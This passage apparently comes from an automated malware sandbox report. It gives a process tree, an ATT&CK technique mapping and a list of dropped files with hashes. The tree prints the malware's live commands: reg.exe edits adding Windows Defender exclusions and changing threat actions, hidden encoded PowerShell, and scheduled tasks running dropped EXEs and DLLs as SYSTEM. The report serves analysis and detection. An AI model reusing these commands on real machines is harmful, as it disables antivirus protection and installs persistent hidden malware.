    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gLDrXcecg" /SC once /ST 13:02:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1096
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gLDrXcecg"
  2⤵
  PID:4788
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gLDrXcecg"
  2⤵
  PID:1016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zjtCPqTOixnxYITTP" /SC once /ST 03:45:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\tThtRPO.exe\" XQ /ExlZdidrb 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:1636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "zjtCPqTOixnxYITTP"
  2⤵
  PID:2836
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 832
  2⤵
  - Program crash
  PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3028
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5096

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3660

C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\tThtRPO.exe
C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\tThtRPO.exe XQ /ExlZdidrb 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3372
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1700
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2020
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:656
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:1812
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3608
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1188
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4088
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4720
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1052
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2680
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2172
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4452
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4740
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:784
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bjeWJKrHnPpdAGCduF"
  2⤵
  PID:3364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:996
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:3128
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:3820
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2900
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:1816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RgdiTWAdU\BlbSzM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gwLAkOfFqvEnRPY" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwLAkOfFqvEnRPY2" /F /xml "C:\Program Files (x86)\RgdiTWAdU\UMKANxN.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3488
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:4024
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pkYJRvtpGfZaSU" /F /xml "C:\Program Files (x86)\dLLzADClkagU2\IUTyuXa.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yMFQLDLxyvLyt2" /F /xml "C:\ProgramData\KTrRWZTJHHaefVVB\lWGJRmX.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "raxKGaIGjdREsorgF2" /F /xml "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\NWBKGdV.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JnvrxUwmUummIDFugIt2" /F /xml "C:\Program Files (x86)\wGxkUGMqSkfBC\WvUCCld.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "mFeioppqsVnzBGRpZ" /SC once /ST 12:43:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\yRmHRMKq\owhoTVz.dll\",#1 /XbdidLHr 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:4148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "mFeioppqsVnzBGRpZ"
  2⤵
  PID:1452
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zjtCPqTOixnxYITTP"
  2⤵
  PID:4756
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 2504
  2⤵
  - Program crash
  PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2424 -ip 2424
1⤵
PID:1668

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\yRmHRMKq\owhoTVz.dll",#1 /XbdidLHr 525403
1⤵
PID:4196
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\yRmHRMKq\owhoTVz.dll",#1 /XbdidLHr 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:3704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "mFeioppqsVnzBGRpZ"
    3⤵
    PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4032 -ip 4032
1⤵
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
1⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

Filesize
129B

MD5
a526b9e7c716b3489d8cc062fbce4005

SHA1
2df502a944ff721241be20a9e449d2acd07e0312

SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.5MB

MD5
99c68a09e41b4d6fdfa73e72b342beed

SHA1
bc6b2eb483d2e2975aa8d65ccd15e62d1dfbd5cc

SHA256
291c5e37fc54c9d9fd1efcfc29ae58221ee818f23e55a0fae8e9c47285b83b8a

SHA512
1d3f687ca95f6b07c6bdf8c4bcb17d4b62b022d207e2d39a9605152f1df8e2bbd9c9164efdc557d13337bf331150ef37e4b0f19e7b6662cc184c02bca7aa66fe

Download Submit
C:\ProgramData\BKJKJEHJJD.exe

Filesize
1.8MB

MD5
c72e70f29d3dd8fa148df55e8e6dec43

SHA1
2f182d43528f78d6d847b37b77da9a09a2ed1f0a

SHA256
baff3039b9acf97084d1b853f495026c52a4c483d010901e226beb599d23df5b

SHA512
d1923e33057413d478daaaaa54bb157762172a58ae03fc36e0c1c6e4d64c0c33d08bff7aec8759f533331215960d739fec2ffea86d18d1d8a70105927a6a5f12

Download Submit
C:\ProgramData\EHJKFCGHID.exe

Filesize
490KB

MD5
93299cd3bcb2a0a2b38eeca1cdb8ae23

SHA1
473d70d598475f0d2784389ff543470638597cb2

SHA256
16a7754de464e184de4de3a7ec93c93d80d340b41b6579744f876c839085e3ca

SHA512
47486788b9f89736c1f9e306a39bca20f606924beed568694b5eb093c8b5042b1486c72e59f0d3350cb35103648babfbf653c75da6ee9293ec78f69bbc9ee3a4

Download Submit
C:\ProgramData\HDBGDHDAECBG\DHJEBG

Filesize
6KB

MD5
f30cb11d35ea8e228eda114112af93c6

SHA1
849db8be90dacaac0ed5b87ef54ff1f99df2b784

SHA256
6a56986801b97869f8756133b0e3f481ac74708f0115498da454cef6da9009b9

SHA512
887faf48e9d538577b236ce4467a838e192c4a8301f00e3915d53512c659ffa55dacb11548e3dc3d29bb8fd14c1ec2af15a633d2f27fc0f20e6cfcc122ff56fa

Download Submit
C:\ProgramData\HDBGDHDAECBG\HDHJEB

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\ProgramData\HDBGDHDAECBG\KJKJKF

Filesize
100KB

MD5
d342f631f89f021020358e47b573914c

SHA1
f8697ca97c30bb9e3b59b2b08c9e4bfb180eb1a1

SHA256
7583599132bb40f6176fc93f108c9e842e9f9ef94dcf2fcac1b1dad83a926cb2

SHA512
0e3360812dbe5ad0a942f1a380048f53ff868cbdecb4d55de26f16d50696839872d57ad6b9d83a685d2bd0a58f513817a3febe5d51878fbe91cf520c73f8a796

Download Submit
C:\ProgramData\IECAFHDBGH.exe

Filesize
687KB

MD5
f3d3b5411e090124197b7b6297b1d8db

SHA1
90522c25164cb4b22242d95678547d86a68e52b7

SHA256
1d519af0b0b48faf1886065d31e5f27000228dad742e2f8f06504838d4bc02d5

SHA512
cee5f1c20cbe4067bafe1dedee8c4db870430b6e6f792accac95d3e05c20a64893ad3dd971182c8e7d001243e5bc933aa2532c93359b4af72ca691fd8fff8736

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe

Filesize
3.5MB

MD5
cb994642f4c4ab67b47fa6185707a4e5

SHA1
8f384f19756ba74ffae13499fcea5024a775d718

SHA256
ed1baadb37dcf7879147083b5a81f8cf03495065dde8b59c52a84de3729ec46f

SHA512
9d127c11f9938089e5d6b1f57b3d5e228d5a81ca53104352f57aedf4eb8f5f9c4e83f215cf38d47afe7028c0d6b3f64e52a93f3e51b7cb16d0fb2b153014fb50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
040e3f17d91b3738ae5119b863b136d8

SHA1
1a1a35c962e78ecadf5d773924a7296e2916e442

SHA256
38e42c464534d5a58a117ae8fab82f59228f24393d89ded093a8502ed435a156

SHA512
03e6943ce494376da77a3869e3193ff4fa1c77872dbf700cf3fd1fd615e81d527109383fc931fee2ee3b4b62b042ad5f7127fe9eb9aa9aa38226932f97a7f654

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
2KB

MD5
661cf82d7ff5c760912b43f583c59aa5

SHA1
924bacd9bb4e0f5f985b4f98bcd4a83a46775497

SHA256
e85f98a486bee3b77e4c15d304d2209d3944ec6e3ac2faadf68ba176edfa64ae

SHA512
44db890cc597390afd2b529af490e0835d14ef703eba6488720524666b76aedc02c7d17977f6c115474b6639ffcce409ebb205deb182b08a48fe5986109b616d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
e080d58e6387c9fd87434a502e1a902e

SHA1
ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

SHA256
6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

SHA512
6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
f2a5b4fb0332b865e60dd6236b5f6f9d

SHA1
269aab9c503e4b7052cfb0e5015d34d4b8f0bfb0

SHA256
7ec5d5ce2b2107e83cee76471687d84a397f14b6b1e5dea37efbc8911bcc2a49

SHA512
f522d5fb82cf76e26ed869da0312c2e702a615435d42f3b9ab7e2f68b02319f15e443161127220cad43f9dbee11f992e1024ca6b2435630bc5b9fcab33756920

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
f3dd318738a5ab171d9b2b3408758791

SHA1
4fb5e78e5d8e9264d765f195bbf5ea54ca7d690c

SHA256
bde01e7c1375ab637bbe2716bc9be9da70f5776ba14098d3882b12d7eef9583c

SHA512
d5114ff1cbca9a35ab87e2c29f4a87bcbc802c8a69d30ae1260617f4f3cf462d2259f1c395841966ccf7f30be39794a388c6933d0616339bfa2a56e49b16f8d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS19CC.tmp\Install.exe

Filesize
6.4MB

MD5
3207aa2e0542244ab72a56ee1ea72f2a

SHA1
f81978e1b36c70b089689d805d394f19d4db1015

SHA256
730ac73bd71873cf40cfffbfef2c7d835f9ddd448356cfc3658cf790ddf4c197

SHA512
c5d110ba56f53bf42e810ec2bc83825e61749e26bc32bf53d54abb7c0962ffc31558b9af532d9b98f9261619b9d1ef56d50a69be013f59ff08ae239cef8dc339

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS25C3.tmp\Install.exe

Filesize
6.7MB

MD5
eff31fe7b30ac5932294fe7663d05219

SHA1
1382bdefb5629e0b78e2cee27574e5d613f17299

SHA256
b825ff183dfdeb0c976f73fa4bbbb079cc4633660e991eaee08f7279ce0a9e8c

SHA512
3bfc15760d05d893d7672d8905fa3c718a134906e6568e98e7789755f0b972317e574537d6f9100a0bb9c15fbc2ac6fe23e8cf8b218a8faaefe9451cf7d6973b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DAAFBAKECA.exe

Filesize
1.8MB

MD5
33b148a195ab7da47629ce7924f9172e

SHA1
a7d39a88eb7fbde5a4b74a0d9b8268dd2a86b8d7

SHA256
9b5bd1a1e9d90b0452cd23af0da4f090c7c29fbe0f16d4156db2589353ca65f3

SHA512
2827762338b15087dc334cab676b18cff1cf3df51cae62b96b0a32c53533eb8217ba91a125e004e4153fc7d8064db13a8ab9fd9455b1085b0aec42528f0fb533

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wh4a5usp.zhv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4MHQ7.tmp\XiiRMqxd1DldtkIsBZaBkkPQ.tmp

Filesize
680KB

MD5
970a34928a80aef236600574f226cf44

SHA1
fefd81e878336e35169e707eb454f6ce1018abb3

SHA256
26c0114be334e55b88f944d32e0e7c540a0eaebfdad30e3a556bdec2bff964a1

SHA512
3e791642209b9e9072820bba84a2db25d1cc76a66a24abf3b5614ad7748744070d67d1a2efaf4a4c2e11087d855bdc22f3fc5b461aa2594069d968c7b3c8c063

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-JJFU3.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
